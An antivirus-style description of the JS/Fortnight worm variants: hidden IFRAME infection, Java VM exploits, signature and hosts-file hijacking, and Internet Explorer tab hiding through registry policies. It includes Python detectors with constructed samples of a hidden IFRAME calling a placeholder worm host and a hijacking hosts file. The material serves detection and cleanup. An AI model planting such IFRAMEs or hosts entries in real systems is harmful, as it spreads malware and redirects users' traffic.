Classification

Category :

Malware

Type :

Worm

Aliases :

Fortnight

Summary

JS/Fortnight is a slow mass mailer written in JavaScript that spreads in HTML-formatted email messages. It sends no mail of its own; instead it hooks the victim's Outlook Express signature so that every message the victim sends carries the infection link.

Removal

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

  • Check for the latest database updates

    First check if your F-Secure security program is using the latest updates, then try scanning the file again.

  • Submit a sample

    After checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.

    Note: If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.

  • Exclude a file from further scanning

    If you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.

    Note: You need administrative rights to change the settings.

Technical Details

Fortnight.A

The infected email message contains a hidden link to a web page that holds the actual worm code. When the recipient opens or views the message, an invisible IFRAME in the HTML body loads that page silently, without any user interaction.

The code on the web page runs by exploiting the Microsoft VM ActiveX component vulnerability. This vulnerability has been fixed in Microsoft security bulletin MS00-075, and the patch is available from Microsoft:

https://www.microsoft.com/technet/security/bulletin/ms00-075.asp

The code uses the cookie "TF" as an infection marker. If the cookie is absent, the worm changes the browser's start page, via the Internet Explorer start page value in the registry, to an adult web site.

Next the worm replaces the default Outlook Express 5.0 signature with the file "C:\Program Files\sign.htm". This file contains the hidden IFRAME that loads the link silently, so from then on every message the user sends from Outlook Express carries the hidden link to the malicious web page. The worm itself never sends mail; it rides on the victim's normal correspondence, which is why it is classed as a slow mass mailer.
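The injected signature is the whole propagation mechanism, so the practical check is to look for remote IFRAMEs that the reader cannot see, both in the Outlook Express signature file and in the HTML part of outgoing or received mail. The following Python is an added example written for this description, not F-Secure's code or the worm's; the host name worm.example.invalid, the sample signature and the sample message are constructed placeholders, not the real worm site or a captured message.

```python
"""Find hidden IFRAMEs in an HTML signature file or in the text/html part of a
mail message. Added example for this description, not F-Secure's code."""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling an infected sign.htm: the frame is zero-sized
# so the recipient sees only the visible signature text. The host name is a
# placeholder, not the worm's real site.
SAMPLE_SIGNATURE = """<html><body>
<p>-- <br>Best regards, Alice</p>
<iframe src="http://worm.example.invalid/index.htm" width="0" height="0"
        frameborder="0"></iframe>
</body></html>
"""

# Constructed raw message carrying the same frame in its HTML body.
SAMPLE_EML = b"""From: alice@example.com
To: bob@example.com
Subject: meeting notes
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><p>Hi Bob, notes attached.</p>
<iframe src="http://worm.example.invalid/index.htm" width="0" height="0"></iframe>
</body></html>
"""


def _is_hidden(attrs):
    """True when the attributes make an IFRAME invisible to the reader:
    zero size, display:none / visibility:hidden, or a bare hidden attribute."""
    zero = ("0", "0px")
    if attrs.get("width") in zero and attrs.get("height") in zero:
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return "hidden" in attrs


class IframeFinder(HTMLParser):
    """Collects every IFRAME with a remote http(s) src and notes whether it is hidden."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        # html.parser yields (name, None) for bare attributes such as "hidden"
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        src = a.get("src", "")
        if urlparse(src).scheme.lower() in ("http", "https"):
            self.findings.append({"src": src, "hidden": _is_hidden(a)})


def find_remote_iframes(html):
    """Return [{'src': ..., 'hidden': ...}] for each remote IFRAME in the HTML."""
    finder = IframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def hidden_remote_iframes(html):
    """The Fortnight signature pattern: a remote frame the reader cannot see."""
    return [f for f in find_remote_iframes(html) if f["hidden"]]


def scan_message(raw):
    """Run the IFRAME check over every text/html part of a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            hits.extend(find_remote_iframes(part.get_content()))
    return hits


if __name__ == "__main__":
    for f in hidden_remote_iframes(SAMPLE_SIGNATURE):
        print("hidden remote iframe in signature:", f["src"])
    for f in scan_message(SAMPLE_EML):
        print("iframe in mail:", f)
```

Point it at the signature file configured for Outlook Express (the description names sign.htm for Fortnight.A and s.htm in the Windows directory for later variants) and at a mailbox export; a zero-sized remote frame in a signature has no legitimate use. Note that the check only recognises the hiding techniques listed in `_is_hidden`, so a frame pushed off-screen with CSS positioning would still be reported only as a visible remote frame.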

The worm then adds three links to the Favorites folder, with the following names:

  • SEXXX. Totaly Teen
  • Make BIG Money
  • 6544 Search Engines Submission

Finally, the worm sets two cookies, "TF" and "RF"; the first expires after 14 days and the second after one day. The web page that hosted JS/Fortnight.A@m has since been taken down, so this variant can no longer infect.

Fortnight.B

Like JS/Fortnight.A, messages infected by JS/Fortnight.B contain a hidden IFRAME pointing to a web site, which redirects to a page containing the worm code; that code again runs via the Microsoft VM ActiveX vulnerability.

When executed, the worm creates the file "s.htm" in the Windows installation directory and alters the Outlook Express 5.0 signature settings so that every message the user sends carries the IFRAME link.

The worm also creates a file named "hosts" in the Windows installation directory, which begins with the following comment lines:

# Copyright (c) 1998 Microsoft Corp.
#
# end of file.

On Windows 95, 98 and ME this file causes connections to certain web sites to be redirected to one of two IP addresses chosen by the worm instead of their real addresses. The effect is limited to those systems because they read the hosts file from the Windows directory; Windows NT, 2000 and XP read %SystemRoot%\system32\drivers\etc\hosts and ignore the dropped file.

Fortnight.C

When a user opens or views an infected email, the invisible frame embedded in the message is activated. This makes the browser connect to a web site containing a small piece of JavaScript, which in turn downloads and runs the Java applet ("a.jar") that contains the worm code.

When the .JAR file runs, it exploits the Microsoft Java VM bytecode verifier vulnerability (known as VerifierBug) to escape the Java sandbox and run with the full privileges of the logged-in user. The JAR file then alters the Internet Explorer search settings and adds three pages to the Favorites folder.

Furthermore, the worm hides the Security and Advanced tabs of the Internet Explorer Internet Options dialog, so the user cannot easily inspect or restore the settings it changed. Internet Explorer honours the SecurityTab and AdvancedTab policy values under HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel for this purpose, so that key is the place to check when cleaning up an infected system.

The .JAR then drops two files, "hosts" and "s.htm", into the Windows installation directory and modifies the registry so that Outlook Express uses "s.htm" as the default signature. The "hosts" file maps a set of domain names to a different web site instead of their real addresses; as with Fortnight.B, the redirection only works on Windows 95, 98 and ME, where the hosts file lives in the Windows directory. The dropped "hosts" file has to be removed manually (or replaced with a known-good copy) from the infected system.
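Both Fortnight.B and Fortnight.C rely on the same trick: a dropped hosts file that sends a list of real site names to a couple of addresses the worm controls. A hosts file is plain text, so the check for it is a small parser that groups names by target address and flags any non-local name that does not resolve to loopback. The following Python is an added example for this description, not F-Secure's code; the sample hosts content is constructed, with placeholder names and RFC 5737 documentation addresses (192.0.2.x) standing in for the worm's real targets, and only the three comment lines are taken from the description above.

```python
"""Parse a hosts file and flag name hijacks of the kind Fortnight.B/.C drop on
Windows 95/98/ME. Added example for this description, not F-Secure's code."""
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample. The three comment lines match what the description
# quotes; the names and addresses are placeholders (RFC 5737 space), not the
# worm's real targets.
SAMPLE_HOSTS = """# Copyright (c) 1998 Microsoft Corp.
#
# end of file.
127.0.0.1       localhost
192.0.2.10      www.search-engine.example
192.0.2.10      www.another-search.example
192.0.2.11      www.portal.example
"""

# Names that legitimately live in a hosts file pointing at the local machine.
LEGIT_LOCAL = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return [(ip, name), ...] for every mapping; comments and blank or
    malformed lines are skipped, names are lower-cased."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ip_address(fields[0])
        except ValueError:
            continue  # not an address, so not a hosts entry
        for name in fields[1:]:
            entries.append((str(ip), name.lower()))
    return entries


def suspicious_entries(text):
    """Map target address -> names for every non-local name that is sent
    somewhere other than loopback or the unspecified (sinkhole) address.
    Several real site names converging on one or two addresses is the
    Fortnight pattern."""
    by_ip = defaultdict(list)
    for ip, name in parse_hosts(text):
        addr = ip_address(ip)
        if name in LEGIT_LOCAL or addr.is_loopback or addr.is_unspecified:
            continue
        by_ip[ip].append(name)
    return dict(by_ip)


def looks_like_fortnight_header(text):
    """True when the file opens with the exact three comment lines the worm
    writes. The stock Windows hosts file carries a multi-line explanatory
    comment header instead, so this short header alone is a strong hint."""
    head = [line.strip() for line in text.splitlines()[:3]]
    return head == ["# Copyright (c) 1998 Microsoft Corp.", "#", "# end of file."]


if __name__ == "__main__":
    print("worm-style header:", looks_like_fortnight_header(SAMPLE_HOSTS))
    for ip, names in suspicious_entries(SAMPLE_HOSTS).items():
        print(ip, "hijacks", ", ".join(names))
```

On Windows 95/98/ME the file to feed in is %windir%\hosts; on NT-based systems it is %SystemRoot%\system32\drivers\etc\hosts, and the worm's copy in the Windows directory is inert there but still worth deleting. Entries pointing at 0.0.0.0 are skipped because ad-blocking hosts files use that address as a sinkhole; anything else that redirects a public name away from its real address deserves a look.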

Additionally, the altered Internet Explorer search settings mean that a site name typed into the address bar without a protocol (http://) is first sent to another web site, which then redirects the browser to the correct address. The detour is invisible to the user, but that site sees every such navigation.

Fortnight.D

This variant is functionally similar to Fortnight.C.

In Fortnight.D the Outlook Express signature file "s.htm" is an encoded script rather than a plain IFRAME. When the script runs, the browser connects to the web site, which downloads and executes the Java applet, now renamed "c.jar".

Additionally, this variant adds five buttons to the Internet Explorer toolbar and creates an empty "hosts" file in the Windows installation directory instead of the redirecting one used by Fortnight.C.

Further information about the Microsoft Java VM bytecode verifier vulnerability exploited by Fortnight.C and Fortnight.D, including a fix, is available in Microsoft security bulletin MS03-011:

http://www.microsoft.com/technet/security/bulletin/ms03-011.asp